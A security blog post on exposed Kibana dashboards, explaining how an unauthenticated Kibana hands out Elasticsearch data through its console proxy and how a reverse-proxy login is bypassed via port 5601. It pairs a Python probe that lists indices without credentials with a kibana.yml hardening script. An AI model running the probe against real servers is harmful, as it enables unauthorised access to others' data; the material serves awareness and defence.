Kibana: the new toy for pentesters, bughunters & hackers

What is Kibana?

Going by the definition on the Elastic website:

Kibana lets you visualize your Elasticsearch data and navigate the Elastic Stack, so you can do anything from learning why you’re getting paged at 2:00 a.m. to understanding the impact rain might have on your quarterly numbers. (or just leave your big data exposed in the wild like a complete noob, editor's note)

Kibana is a very useful tool for interacting with all the data flowing into your Elasticsearch stack. Elasticsearch and the Elastic Stack are data-gathering applications that let users process and use that data in a wide range of ways and for many different purposes.

Why is Kibana so dangerous?

As of today (25 March 2019) a Shodan.io search returns 26,833 (!!!) Kibana instances running on the internet (a number that has grown by around 35 to 70 per day over the last few weeks). Of course, as with any other well-programmed web app, you can secure access to a public Kibana instance with a number of authentication methods (X-Pack security, a third-party plugin such as Search Guard, or HTTP authentication on a reverse proxy placed in front of it).
The real, practical issue lies in:

  1. Lack of clear documentation, aimed at the average developer, on how to secure a Kibana instance
  2. Bad security-chain practice, which results in an otherwise well-secured server infrastructure being compromised through the last node of the chain (!!!)

The first point speaks for itself.

About the real issue: even if your server is locked down and well configured, and Elasticsearch is bound to 127.0.0.1, localhost or some other loopback address, an unprotected Kibana app running on top of that Elasticsearch stack can compromise your server's operation. Unauthenticated users get the full Kibana dashboard (a Kibana without a security layer has no notion of users at all, so everyone who reaches it is effectively an administrator), and since Kibana talks to Elasticsearch on the visitor's behalf, for instance through the Dev Tools console, the loopback-only binding of Elasticsearch no longer protects the data: anyone who can reach Kibana can read, modify or delete the indices. That is a strong foothold for further privilege escalation by malicious actors.
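The chain just described, as an added example that is not code from the original post: a small probe that asks the front port whether it demands a login, then goes to Kibana's port 5601 directly and, if `/api/status` answers without credentials, lists the Elasticsearch indices through Kibana's own `/api/console/proxy` endpoint (the one the Dev Tools console uses; it needs a POST with a `kbn-xsrf` header). The host name, the Kibana version and the canned HTTP responses are constructed so the script runs offline; against a real target you would call `audit("host")` with the default opener.

```python
"""Probe an exposed Kibana the way the post describes (added example).

Elasticsearch may listen only on 127.0.0.1, but Kibana reaches it through
its own /api/console/proxy endpoint (what the Dev Tools console uses), so an
unauthenticated Kibana on 5601 hands out the indices anyway. Hostnames and
canned responses are constructed so this runs offline.
"""
import io
import json
import urllib.error
import urllib.parse
import urllib.request

KIBANA_PORT = 5601  # Kibana's default listening port


def http(url, method="GET", headers=None, opener=urllib.request.urlopen):
    """(status, body); HTTP errors become a status, refused connections (None, '')."""
    req = urllib.request.Request(url, method=method, headers=headers or {})
    try:
        with opener(req, timeout=5) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:  # subclass of URLError, so catch it first
        return err.code, err.read().decode("utf-8", "replace")
    except (urllib.error.URLError, OSError):
        return None, ""


def kibana_version(base_url, opener=urllib.request.urlopen):
    """/api/status answers 200 with JSON only when no auth layer sits in front."""
    status, body = http(base_url + "/api/status", opener=opener)
    try:
        return json.loads(body)["version"]["number"] if status == 200 else None
    except (ValueError, KeyError, TypeError):
        return None


def es_via_console(base_url, es_path="_cat/indices?format=json", opener=urllib.request.urlopen):
    """Run an Elasticsearch request through Kibana's console proxy.

    The ES path travels as a query parameter, the kbn-xsrf header is required,
    and Kibana forwards the call with its own Elasticsearch access: that is
    why binding Elasticsearch to loopback protects nothing here.
    """
    url = "{}/api/console/proxy?path={}&method=GET".format(base_url, urllib.parse.quote(es_path, safe=""))
    status, body = http(url, method="POST", headers={"kbn-xsrf": "true"}, opener=opener)
    try:
        return json.loads(body) if status == 200 else None
    except ValueError:
        return None


def audit(host, front_port=80, opener=urllib.request.urlopen):
    """Walk the chain from the post: the proxy on the front port may demand a
    login while port 5601, reached directly, does not."""
    result = {"host": host, "front_auth": False, "kibana_version": None, "indices": [], "exposed": False}
    status, _ = http("http://{}:{}/api/status".format(host, front_port), opener=opener)
    result["front_auth"] = status in (401, 403)  # the reverse proxy challenged us
    direct = "http://{}:{}".format(host, KIBANA_PORT)
    result["kibana_version"] = kibana_version(direct, opener=opener)
    if result["kibana_version"]:
        result["exposed"] = True
        rows = es_via_console(direct, opener=opener) or []
        result["indices"] = [r["index"] for r in rows if isinstance(r, dict) and "index" in r]
    return result


class CannedResponse:
    """Minimal stand-in for the response object urlopen returns (test double)."""
    def __init__(self, status, body):
        self.status, self._body = status, body.encode()
    def read(self):
        return self._body
    def __enter__(self):
        return self
    def __exit__(self, *exc):
        return False


def canned_opener(table):
    """Opener answering from {(method, url): (status, body)}; unknown URLs act refused."""
    def opener(req, timeout=5):
        if (req.get_method(), req.full_url) not in table:
            raise urllib.error.URLError("connection refused")
        status, body = table[(req.get_method(), req.full_url)]
        if status >= 400:
            raise urllib.error.HTTPError(req.full_url, status, "error", {}, io.BytesIO(body.encode()))
        return CannedResponse(status, body)
    return opener


# Constructed sample host: nginx on :80 demands a login, Kibana on :5601 answers
# anyone, Elasticsearch is bound to 127.0.0.1 only. All names are invented.
EXPOSED_HOST = "kibana.example.test"
SAMPLE_DIRECT_URL = "http://{}:{}".format(EXPOSED_HOST, KIBANA_PORT)
SAMPLE_OPENER = canned_opener({
    ("GET", "http://{}:80/api/status".format(EXPOSED_HOST)): (401, "Authorization Required"),
    ("GET", SAMPLE_DIRECT_URL + "/api/status"): (200, json.dumps({"version": {"number": "6.6.1"}})),
    ("POST", SAMPLE_DIRECT_URL + "/api/console/proxy?path=_cat%2Findices%3Fformat%3Djson&method=GET"):
        (200, json.dumps([{"index": ".kibana_1"}, {"index": "customers-2019.03"}])),
})

if __name__ == "__main__":
    print(json.dumps(audit(EXPOSED_HOST, opener=SAMPLE_OPENER), indent=2))
```

The verdict to look for is `front_auth: true` together with `exposed: true`: the login page on the proxy is doing its job, and it does not matter, because the indices come back through the Kibana port anyway.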

In my research I also found that a misconfigured Apache or Nginx reverse proxy that serves a login page on port 80 or 8080 can be trivially bypassed: if Kibana is not bound to a private (loopback or internal) address, we can simply connect directly to the Kibana port (5601 by default) and skip the proxy altogether. The login page then protects nothing. A quick check is to request /api/status on port 5601 from outside the host and see whether it answers without any credentials.
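The defensive side of that bypass, as an added example and not code from the original post: the one kibana.yml setting that decides whether port 5601 is reachable past the proxy is `server.host`. The script below flags values that bind every interface (Kibana's official Docker image ships `server.host: "0"`), reports the exact combination the post describes (Elasticsearch on loopback, Kibana wide open), and rewrites the setting to 127.0.0.1 so only a reverse proxy on the same host can reach Kibana. The sample config is constructed; the parser handles the flat `key: value` lines kibana.yml uses, not arbitrary YAML.

```python
"""Audit and fix the kibana.yml setting the post's bypass relies on (added example).

A login page on the reverse proxy is worthless if Kibana itself listens on every
interface: the attacker goes straight to port 5601. This flags server.host values
that bind all addresses and rewrites them to loopback. Parsing covers the flat
`key: value` lines kibana.yml uses, not arbitrary YAML; the sample is constructed.
"""
import re
from urllib.parse import urlsplit

# Values Kibana treats as "listen on every interface" (its Docker image ships server.host: "0").
WILDCARD_HOSTS = {"0", "0.0.0.0", "::", "::0"}
LOOPBACK_HOSTS = {"localhost", "127.0.0.1", "::1"}
SETTING = re.compile(r'^\s*(?P<comment>#\s*)?(?P<key>[\w.]+):\s*(?P<val>.*?)\s*$')


def settings(text):
    """{key: value} for the active (uncommented) settings, surrounding quotes stripped."""
    found = {}
    for line in text.splitlines():
        m = SETTING.match(line)
        if m and not m.group("comment"):
            found[m.group("key")] = m.group("val").strip("\"'")
    return found


def es_host(cfg):
    """Host of the first Elasticsearch endpoint (7.x elasticsearch.hosts or 6.x elasticsearch.url)."""
    raw = cfg.get("elasticsearch.hosts") or cfg.get("elasticsearch.url") or "http://localhost:9200"
    first = raw.strip("[] ").split(",")[0].strip("\"' ")
    return urlsplit(first).hostname or first


def audit(text):
    """Findings, as strings, for the exposure the post describes."""
    cfg = settings(text)
    host = cfg.get("server.host", "localhost")  # Kibana's own default when the line is commented out
    port = cfg.get("server.port", "5601")
    findings = []
    if host in WILDCARD_HOSTS:
        findings.append("server.host={!r} binds every interface: port {} is reachable directly, "
                        "bypassing any login on the reverse proxy".format(host, port))
        if es_host(cfg) in LOOPBACK_HOSTS:
            findings.append("elasticsearch on {} is loopback-only, but Kibana proxies to it for "
                            "anyone who reaches port {}".format(es_host(cfg), port))
    elif host not in LOOPBACK_HOSTS:
        findings.append("server.host={!r} is not loopback: make sure it is a private interface "
                        "that the proxy, and nobody else, can reach".format(host))
    return findings


def harden(text):
    """Return the config with server.host forced to 127.0.0.1 (appended if no active line exists)."""
    out, replaced = [], False
    for line in text.splitlines():
        m = SETTING.match(line)
        if m and not m.group("comment") and m.group("key") == "server.host":
            out.append('server.host: "127.0.0.1"')
            replaced = True
        else:
            out.append(line)
    if not replaced:
        out.append('server.host: "127.0.0.1"')
    return "\n".join(out) + "\n"


# Constructed sample: a Docker-style kibana.yml with Elasticsearch on loopback and Kibana wide open.
SAMPLE_KIBANA_YML = """\
server.port: 5601
server.host: "0"
elasticsearch.url: "http://localhost:9200"
#server.name: "your-hostname"
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_KIBANA_YML):
        print("FINDING:", finding)
    print(harden(SAMPLE_KIBANA_YML))
```

Binding Kibana to loopback is only half of the fix: the reverse proxy must then be the only thing that talks to 127.0.0.1:5601, and it must apply its authentication to every path, not just to the login page.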

More: https://twitter.com/InfoSecIta/status/1111243452602306561

Stay safe out there.

If this helped, please share a coffee, a beer or some healthy juice with me by donating #bitcoin to 14Q6FnBkwFXchnUd3ddakTPiX29gTqUdaK